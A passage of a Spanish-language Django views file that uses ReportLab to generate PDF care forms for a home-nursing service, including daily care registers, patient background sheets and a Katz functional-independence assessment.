Gestión autónoma\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Necesita supervisión en la toma de medicación y/o ayuda ocacional en la sdministracion de\")\n\ty=y-15\n\tc.drawString(35,y, \" determinados tratamientos\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Hay que prepararle y administrarle la medicación diariamente\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Precisa sueroterapia, oxigenoterapia, alimentacion por sonda nasogastrica, etc.\")\n\n\ty=y-30\n\tc.drawString(35,y, \"8.- CUIDADOS DE ENFERMERIA: (Prevención de escaras, curas de pie diabéticos, curas adicionales\")\n\ty=y-15\n\tc.drawString(35,y, \" al cuidado habitual de la FAV, mayor supervisión o sintomatología durante la dialisis portadores\")\n\ty=y-15\n\tc.drawString(35,y, \" de caracteres..)\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Precisa cura o actuación ocacional de enfermería\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Precisa cura o actuación de enfermería preiodicamente\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Supervicion continuada: atención de enfermos terminales, curas de lesiones graves\")\n\n\ty=y-30\n\tc.drawString(35,y, \"9.- NECESIDADES DE VIGILANCIA:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) No precisa\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Trastornos de conducta temporales que impliquen necesidad de vigilancia ocacional\")\n\ty=y-15\n\tc.drawString(35,y, \" \")\n\ty=y-15\n\tc.drawString(35,y, \"(2) Trastornos de conducta permanentes que alteren la convivencia de forma leve o\")\n\ty=y-15\n\tc.drawString(35,y, \" moderada (ideas de muerte)\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Trastornos de conducta intensos permanentes que alteren la convivencia de forma\")\n\ty=y-15\n\tc.drawString(35,y, \" grave (riesgo de suicidio)\")\n\n\ty=y-30\n\tc.drawString(35,y, \"10.- COLABORACION:\")\n\ty=y-15\n\tc.drawString(35,y, \"(0) Colaborador\")\n\ty=y-15\n\tc.drawString(35,y, \"(1) Comportamiento pasivo (necesita estímulo)\")\n\ty=y-15\n\tc.drawString(35,y, \"(2) No colabora\")\n\ty=y-15\n\tc.drawString(35,y, \"(3) Rechazo categórico y constante\")\n\n\t#c.drawString(35,y, \"parametros: h=\"+str(h)+\" w=\"+str(w)+\" y=\"+str(y)+\" alto=\"+str(alto)+\" ancho=\"+str(ancho))\n\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\tresponse['Content-Disposition'] = 'attachment; filename='+nom_arch\n\tvariable1 = 'Despliegue de Pacientes'\n\tpaciente = Pacientes.objects.all().order_by('nombre')\n\tfalso_x = False # paciente HABILITADO - DESHABILITADO \n\tcontext = {\t\"pacientes\":paciente,\"falso_x\":falso_x,\"variable1\":variable1,}\n\treturn render(request,'grid_pacientes.html',context)\n\n\n#class verticalText(Flowable):\n#\tdef __init__(self, text):\n#\t\tFlowable.__init__(self)\n#\t\tself.text = text\n#\n#\tdef draw(self):\n#\t\tc = self.canv\n#\t\tc.rotate(90)\n#\t\tfs = c._fontsize\n#\t\tc.translate(1, -fs/1.2) # canvas._leading?\n#\t\tc.drawString(0, 0, self.text)\n#\n#\tdef wrap(self, aW, aH):\n#\t\tc = self.canv\n#\t\t#fn, fs = c._fontname, c._fontsize\n#\t\t#return c._leading, 1 + c.stringWidth(self.text, fn, fs)\n#\t\treturn self.text\n\n\n@login_required(login_url='login_ini')\ndef regdiario(request):\n\tfechahoy = datetime.now()\n\t#ancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\talto, ancho = letter\t# 
alto=792,ancho=612 - posicion apaisada\n\tnom_arch = \"regdia\"+nombrearch()+\".pdf\"\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tfe_nac = paciente.fe_nac\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfe_nac = paciente.fe_nac\n\t#\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\t#\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\n\t# ######### COMIENZA EL REPORTE ######################################\t\t\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#y = y - 20\t # alto de logo \n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(350,y, \"REGISTRO DIARIO\")\n\ty= y-3\n\tc.drawString(350,y, \"________________\")\n\ty = y -15\n\tc.setFont('Helvetica', 10)\n\n\tc.drawString(30,y,\"Paciente: \"+str(paciente)+\", RUT: \"+rut_aux+\" edad: \"+str(edad_x)+\" sexo: \"+sexo_x)\n\ty = y - 15\n\tc.drawString(30,y,\"Domicilio: \"+domicilio_x+\" Teléfono: \"+fono_pcte+\" Prevision de Salud Comun:\")\n\ty = y - 15\n\tc.drawString(30,y,\"Fecha de Nacimiento: \"+fecha_ddmmaaaa(fe_nac)+\" Fecha de inicios de Cuidados: _____/_____/______\")\n\t\n\ty = y - 35\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Signos Vitales\")\n\tc.drawString(210,y, \"Nombre TENS o cuidadoras: _______________________ ______________________ _________________\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Plan de enfermería\",\"S/N\",\"Horario \",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\"],\n\t\t[\"Temperatura\",\"\",\"\",\"\"],\n\t\t[\"Frecuencia cardiaca\",\"\",\"\"],\n\t\t[\"Presión arterial\",\"\",\"\"],\n\t\t[\"Frecuencia respiratoria\",\"\",\"\"],\n\t\t[\"Saturacion O2\",\"\",\"\"],\n\t\t[\"LT O2\",\"\",\"\"],\n\t\t[\"EVA\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 295, 0) # alto=792, h=90\n\t# ################ fin primera grid de PRIMERA HOJA ###############################################\n\ty = 275\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Prepartamos\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Aspiración Sensoriales\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Condición tratestomía\",\"\",\"\",\"\"],\n\t\t[\"Cambio Endocanula,\",\"\",\"\"],\n\t\t[\"Cambio set nebulización\",\"\",\"\"],\n\t\t[\"Cambio set Oxigenoterapia\",\"\",\"\"],\n\t]\n\n\tt = Table(data, 
colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\t#return HttpResponse(\"w=\"+str(w)+\" h=\"+str(h))\n\tt.drawOn(c, 30, 180, 0) \n\t# ############### fin segunda grid DE PRIMERA HOJA ###############\t\n\ty = 160\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"Receta\")\n\tc.setFont('Helvetica', 10)\n\n\tdata = [\n\t\t[\"Alimentacion\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Hidratación\",\"\",\"\",\"\"],\n\t\t[\"Curacion Gastrotomía,\",\"\",\"\"],\n\t\t[\"Cambio circuito Infución\",\"\",\"\"],\n\t]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 80, 0) \n\t# ############### fin tercera GRID ###############\t\n\t# ############### fin primera hoja ###############\t\n\tc.showPage() #salto de pagina\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\t#\n\tdata = [\n\t\t[\"Plan de enfermería\",\"S/N\",\"Horario \",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\",\"Fecha\"],\n\t\t[\"Baño\",\"\",\"\",\"\"],\n\t\t[\"Lavado de cabello\",\"\",\"\"],\n\t\t[\"Aseo de cavidades\",\"\",\"\"],\n\t\t[\"Rasurado\",\"\",\"\"],\n\t\t[\"Aseo genital\",\"\",\"\"],\n\t\t[\"Cambio de pañal\",\"\",\"\"],\n\t\t[\"Preservativo\",\"\",\"\"],\n\t\t[\"Cambio ropa de cama\",\"\",\"\"],\n\t\t[\"Revis. 
puntos de apoyo\",\"\",\"\"],\n\t\t[\"Lubricación de piel\",\"\",\"\"],\n\t\t[\"Cambio posición\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = y - 10\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(30,y, \"Aseo y Confort\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 298, 0) # alto=792, h=90\n\t## FIN PRIMERA GRID DE SEGUNDA HOJA ########################################\n\t#\n\tdata = [\n\t\t[\"Estimulación anál\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"Curación yeyunostomía\",\"\",\"\",\"\"],\n\t\t[\"Curación ileostomia\",\"\",\"\"],\n\t\t[\"Curacion colostomía\",\"\",\"\"],\n\t\t[\"Diuresis total\",\"\",\"\"],\n\t\t[\"Cambio bolsa recolectora\",\"\",\"\"],\n\t\t[\"Vaciamiento bolsa ostomía\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\t# --grid y titulo respectivo ---\n\ty = 280\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(30,y, \"Eliminación\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 150, 0) \n\n\t## FIN SEGUNDA GRID DE SEGUNDA HOJA ########################################\n\tdata = [\n\t\t[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\"],\n\t\t[\"\",\"\",\"\"],]\n\n\tt = Table(data, colWidths=[120,35,60,72])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\t# -- deploy de grid y titulo respectivo ---\n\ty = 130\n\tc.setFont('Helvetica-Bold',10)\n\tc.drawString(35,y, \"Otros\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 50, 0) \n\t## FIN TERCERA GRID DE SEGUNDA HOJA ########################################\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(145,26,\"Atención y Cuidado de enfermos, Procedimientos de enfermería, Kinesiología y Nutrición\")\n\t#\n\t## ######## FIN DEL REPORTE ####################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef antecedente2(request):\n\tfechahoy = datetime.now()\n\talto, ancho = letter\t# alto=792,ancho=612\n\tnom_arch = \"regdia\"+nombrearch()+\".pdf\"\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 
pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x'] # variable publica\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\t#\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t# ######### COMIENZA EL REPORTE ##########################################\t\t\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tdata = [\n\t\t[\"Nombre\",paciente.nombre],\n\t\t[\"R.U.T.\",paciente.rut],\n\t\t[\"Edad\",edad_x],\n\t\t[\"Dirección\",paciente.direccion],\n\t\t[\"Comuna\",comuna.descrip],\n\t\t[\"Telefono fijo / celular\",fono_pcte],\n\t\t[\"Estado civil\",ecivil],]\n\n\tt = Table(data, colWidths=[130,360])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = 516\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"ANTECEDENTES DEL PACIENTE\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 380, 0) \n\t# ################ FIN PRIMERA GRID ###############################################\n\ty = 530\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\tdata = [\n\t\t[\"Diagnosticos\",\"Laborales\",\"No laborales\"],\n\t\t[\"Prestador sala común\",],\n\t\t[\"Jornada Cuidadoras\",\"\"],\n\t\t[\"Controles médicos\",\"\"],\n\t\t[\"Rehabilitación\",\"\"],\n\t\t[\"Mantención\",\"\"],\n\t\t[\"Cargas\",\"\"],\n\t\t[\"Próxio control de salud\",\"\"],\t\t\n\t\t]\n\n\tt = Table(data, colWidths=[130,260,260])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\n\ty = 360\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(30,y, \"ANTECEDENTES DE SALUD\")\n\tc.setFont('Helvetica', 10)\n\n\tw, h = t.wrap(100, 100) \n\tt.drawOn(c, 30, 210, 0)\t# dibuja la grid en memoria \n\t# ################ FIN SEGUNDA GRID ###############################################\n\n\t# rectangulo\n\tesquina = 230\n\tc.rect(460, esquina, 30, 30)\n\n\t## ######## FIN DEL REPORTE ############################################\n\tc.showPage() #salto de pagina\n\tc.save() #Archivamos y cerramos el canvas\n\t#Lanzamos el pdf creado\n\tos.system(nom_arch)\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\ndef antecedente(request):\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 
'modifica_rut'\n\n\t# ------------ DATOS DEL PACIENTE -----\n\trut_aux = request.session['rut_x'] # variable publica\n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\"\n\n\tdomicilio_x = paciente.direccion\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#------------FIN DATOS DEL PACIENTE ------\n\n\tcontext = {\n\t\t'paciente':paciente,\n\t\t'rut':rut_aux,\n\t\t'edad':edad_x,\n\t\t'direccion':domicilio_x,\n\t\t'comuna':comuna,\n\t\t'fono':paciente.fono_pcte,\n\t\t'ecivil':ecivil,\n\t}\n\treturn render(request,'anexo1a.html',context)\n\n\t\ndef antecedente_provi(request):\n\t# desarrollo\n\tlogo_corp = \"/static/img/Logo_AsistenciaIntegral.jpg\"\n\t#produccion\n\t#logo_corp = \"/staticfiles/img/Logo_AsistenciaIntegral.jpg\" \n\t#\n\ttemplate = get_template('anexo1a.html')\n\n\tvariable1 = 'Ficha de Apoderado'\n\tvariable2 = 'modifica_rut'\n\n\t# ------------ DATOS DEL PACIENTE -----\n\trut_aux = request.session['rut_x'] # variable publica\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\tcomuna = Param.objects.get(tipo='COMU',codigo=paciente.comuna)\n\n\tecivil = \"No especifica\"\n\tif paciente.ecivil != None:\n\t\tecivil = Param.objects.get(tipo='ECIVI',codigo=paciente.ecivil)\n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\tedad_x = edad(paciente.fe_nac) # en misfunciones.py\n\n\tsexo_x = \"Masculino\"\n\tif paciente.sexo == 2:\n\t\tsexo_x = \"Femenino\" \n\n\tdomicilio_x = paciente.direccion\t\n\tfono_pcte = paciente.fono_pcte\n\tfono2_pcte = paciente.fono2_pcte\n\tif paciente.fono2_pcte == None:\n\t\tfono2_pcte = \"\"\n\t#------------FIN DATOS DEL PACIENTE ------\n\tcontext = {'logo_corp':logo_corp,\n\t\t'paciente':paciente,\n\t\t'rut':rut_aux,\n\t\t'edad':edad_x,\n\t\t'direccion':domicilio_x,\n\t\t'comuna':comuna,\n\t\t'fono':paciente.fono_pcte,\n\t\t'ecivil':ecivil,\n\t}\n\n\thtml = template.render(context)\n\tpdf = render_to_pdf('anexo1a.html')\n\t#return HttpResponse(pdf, content_type='application/pdf')\n\treturn render(request,'anexo1a.html',context)\n\n\n@login_required(login_url='login_ini')\ndef gestionremota(request):\n\tfechahoy = datetime.now()\n\tancho, alto = letter\t# alto=792,ancho=612 - posicion normal\t\n\tnom_arch = \"gestionre\"+nombrearch()+\".pdf\" # gestion remota\n\t#\n\t# desarrollo\n\tlogo_corp = os.getcwd()+\"\\\\misitio\\\\ai\\\\static\\\\img\\\\Logo_AsistenciaIntegral.jpg\"\n\tc = canvas.Canvas(os.getcwd() +\"\\\\pdfs\\\\\"+ nom_arch, pagesize=letter)\n\t#\n\t#produccion\n\t#logo_corp = os.getcwd()+\"/misitio/staticfiles/img/Logo_AsistenciaIntegral.jpg\"\n\t#c = canvas.Canvas(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, pagesize=letter)\n\t#\n\tc.setPageSize((ancho, alto))\n\t#\n\trut_aux = request.session['rut_x']\t\t\n\tpaciente = Pacientes.objects.get(rut=rut_aux) \n\n\tif paciente.fe_ini == None:\n\t\treturn HttpResponse(\"Paciente no posee fecha de inicio\")\n\n\t# produccion\n\t#path_x = os.getcwd() +\"/misitio/pdfs/\"\n\n\t# Desarrollo\n\tpath_x = os.getcwd() +'\\\\pdfs\\\\'\n\n\tarch_y = 
os.listdir(path_x)\n\tfor arch_pdf in arch_y:\n\t\tremove(path_x+arch_pdf)\n\t#\t\n ## #####################################comienza primera pagina #########\n\ty = 710\n\tc.drawImage(logo_corp, 10, y,190,80) # (IMAGEN, X,Y, ANCHO, ALTO)\n\ty = 700\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(190,y, \"GESTION REMOTA DE PACIENTES CIMAS + D\")\n\tc.setFont('Helvetica', 11)\n\t#\n\t# subrrayado de \"GESTION REMOTA DE PACIENTES\"\n\ty=y-20\n\tc.line(190, y+16, 436, y+16) # x,y,z,w en donde x=posic. horiz. inicial,y=poc.inicial verical,w=poc.vert.final\n\t#\n\ty = y - 20\n\tc.drawString(50,y,\"NOMBRE: \"+str(paciente.nombre)+\" R.U.T.:\"+rut_aux)\n\ty = y - 20\t\n\tc.drawString(50,y,\"FECHA: \"+\"_______/_________/__________\")\n\ty = y - 30\t\n\n\tc.setFont('Helvetica-Bold', 11)\n\tc.drawString(50,y,\"EVALUACION FUNCIONAL:\")\n\tc.setFont('Helvetica', 10)\n\ty=y-15\n\tc.drawString(50,y, \"Indice de Katz: Este indice se basa en la avaluación de independencia o dependencia funcional del paciente para:\")\n\ty=y-15\t\n\tc.drawString(50,y,\"bañarse, vestirse, ir al baño, transferirse, continencia y alimentación.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"Independiente: Habilidad para funcionar sin supervisión, dirección o asistencia personal activa, excepto si es\")\n\ty=y-15\t\n\tc.drawString(50,y,\"especificamente aclarado en las definiciones.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"Se basa en el estado actual, no en la habilidad que tenga.\")\n\ty=y-15\t\n\tc.drawString(50,y,\"A los pacientes que se nieguen a realizar una función, se les considerará incapaces de realizarla aunque\")\n\ty=y-15\t\n\tc.drawString(50,y,\"parezcan capaces.\")\n\n\n\t# COMIENZA DEFINICION DE GRID\n\tdata = [\n\t\t[\"\",\"A\",\"Independiente para alimentarse, transferirse,continencia, ir al baño, vestirse, bañarse\"],\n\t\t[\"\",\"B\",\"Independiente para todas, excepto para una de estas funciones.\"],\n\t\t[\"\",\"C\",\"Independiente para todo, excepto bañarse, y una funcion más\"],\n\t\t[\"\",\"D\",\"Independiente para todo, excepto bañarse, vestirse, y una funcion adicional\"],\n\t\t[\"\",\"E\",\"Independiente para todo, excepto bañarse, vestirse, ir al baño, y una función más\"],\n\t\t[\"\",\"F\",\"Independiente para todo, excepto bañarse, vestirse, ir al baño, transferirse y una función más\"],\t\t\n\t\t[\"\",\"G\",\"Dependiente en las seis funciones (todas)\"],\n\t]\n\n\t# DEFINICION DE CADA COLUMNA\n\tt = Table(data, colWidths=[30,20,450])\t\n\n\tt.setStyle(TableStyle([\n\t\t(\"ALIGN\", (0, 0), (-1, -1), \"LEFT\"),\n\t\t(\"ALIGN\", (-2, 1), (-2, -1), \"LEFT\"),\n\t\t(\"GRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"BOX\", (0, 0), (-1, -1), 0.25, colors.black),\n\t\t(\"INNERGRID\", (0, 0), (-1, -1), 0.25, colors.black),\n\t]))\n\tw, h = t.wrap(100, 100) # OBLIGAORIO\n\tt.drawOn(c, 50, 370, 0) # DIBUJA LA GRID EN MEMORIA\n\t# FIN DE DEFINICION DE GRID\n\ty = 349\n\t# rectangulo\n\tc.rect(50, y, 500, 20)\n\t#\t\n\tc.drawString(50,y+8, \" Indice de Katz PUNTUACION FINAL:\")\n\ty=y-15\n\tc.drawString(50,y,\"Indice de Katz de independencia de las actividades de la vida diaria.\")\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(50,y,\"Bañarse:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(95,y,\"(en tina o ducha)\")\n\t#\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(290,y,\"Transferirse:\")\n\tc.setFont('Helvetica', 10)\n\ty=y-15\n\tc.setFont('Helvetica-Bold', 10)\n\tc.drawString(50,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(125,y,\"Se baña 
completamente o necesita\")\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Independiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(365,y,\"Entra y sale de la cama independientemente\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"Necesita ayuda solo para jabonarse ciertas regiones\")\n\t#\n\t#segundo bloque\n\tc.drawString(290,y,\"se sienta y para de la silla (puede usar soporte mecánico)\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(espalda u otra extremidad dañada)\")\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(118,y,\"Requiere ayuda para bañarse\")\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Dependiente:\")\n\tc.setFont('Helvetica', 10)\n\tc.drawString(358,y,\"Requiere ayuda para moverse\")\n\t#\n\ty=y-15\n\tc.drawString(50,y,\"(mas de una parte del cuerpo, o para entrar o\")\n\t#segundo bloque\n\tc.drawString(290,y,\"más transferencias.\")\n\t#\n\ty=y-15\t\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(50,y,\"Vestirse:\")\n\tc.setFont('Helvetica', 10)\n\t#segundo bloque\n\tc.setFont('Helvetica-Bold', 10)\t\n\tc.drawString(290,y,\"Continencia:\")\n\tc.setFont('Helvetica', 